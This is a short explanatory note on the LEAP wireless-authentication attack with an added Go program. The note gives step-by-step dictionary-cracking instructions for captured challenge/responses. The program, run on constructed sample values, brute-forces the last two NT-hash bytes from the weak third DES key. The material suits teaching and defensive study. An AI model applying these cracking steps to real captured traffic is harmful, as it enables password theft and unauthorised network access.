LEAP attack

The third DES key is weak: the 16-byte NT hash is padded with 5 NULL bytes to 21 bytes and split into three 7-byte DES keys, so the third key holds only the last 2 bytes of the hash plus the 5 NULLs. That leaves only 2^16 possibilities for the third key in every challenge/response.

  1. Take a large password list, calculate the NT (MD4) hash of each password, and store it as a password+NT-hash list

  2. Capture a LEAP challenge/response, extract the username, challenge and response, and calculate the last 2 bytes of the NT hash from the third 8-byte block of the response (a 2^16 search)

  3. Search the password+hash list for hashes whose last 2 bytes match, e.g. (BN-1BN stands for the two recovered bytes in hex):

       grep "BN-1BN$" nthash-dict > possible-passwords

  4. Use each matching entry's hash to encrypt the captured challenge; the entry whose calculated response equals the captured response reveals the user's password
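As an added illustration (not part of the original notes, and not asleap's code), the Go program below builds the LEAP/MS-CHAP response from an NT hash and shows why step 2 works: the third DES key is hash[14], hash[15] plus five NULLs, so a search over just 2^16 keys recovers the last two hash bytes from a single challenge/response. The NT hash and challenge are constructed sample values; parity bits are left zero because DES discards them.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"fmt"
)

// desFrom7: spread a 7-byte key's 56 bits over 8 bytes (7 per byte); DES ignores the parity bit, so it stays 0.
func desFrom7(k7 []byte) cipher.Block {
	var v uint64
	for _, b := range k7 {
		v = v<<8 | uint64(b)
	}
	k8 := make([]byte, 8)
	for i := range k8 {
		k8[i] = byte(v>>(49-7*uint(i))&0x7f) << 1
	}
	blk, _ := des.NewCipher(k8) // only fails on a wrong key length, which cannot happen here
	return blk
}
// leapResponse: NT hash + 5 NULLs = 21 bytes = three 7-byte DES keys, each encrypting the same 8-byte challenge.
func leapResponse(ntHash, challenge []byte) []byte {
	padded := append(append([]byte{}, ntHash...), 0, 0, 0, 0, 0)
	resp := make([]byte, 24)
	for i := 0; i < 3; i++ {
		desFrom7(padded[7*i : 7*i+7]).Encrypt(resp[8*i:8*i+8], challenge)
	}
	return resp
}
// recoverLastTwoBytes: the third key is hash[14], hash[15] + five NULLs, so 2^16 candidates cover it.
func recoverLastTwoBytes(challenge, response []byte) ([]byte, bool) {
	var out [8]byte
	for c := 0; c < 1<<16; c++ {
		key7 := []byte{byte(c >> 8), byte(c), 0, 0, 0, 0, 0}
		desFrom7(key7).Encrypt(out[:], challenge)
		if bytes.Equal(out[:], response[16:24]) {
			return key7[:2], true
		}
	}
	return nil, false
}
func main() {
	ntHash := []byte{0xa1, 0xb2, 0xc3, 0xd4, 0xe5, 0xf6, 0x07, 0x18, 0x29, 0x3a, 0x4b, 0x5c, 0x6d, 0x7e, 0x8f, 0x90} // constructed sample, not a real hash
	challenge := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}                                             // constructed sample challenge
	last2, ok := recoverLastTwoBytes(challenge, leapResponse(ntHash, challenge))
	fmt.Printf("recovered hash[14:16]=%x found=%v\n", last2, ok)
}
```

The first two response blocks still depend on the other 14 hash bytes, which is why the notes follow this with a dictionary lookup rather than a full hash recovery.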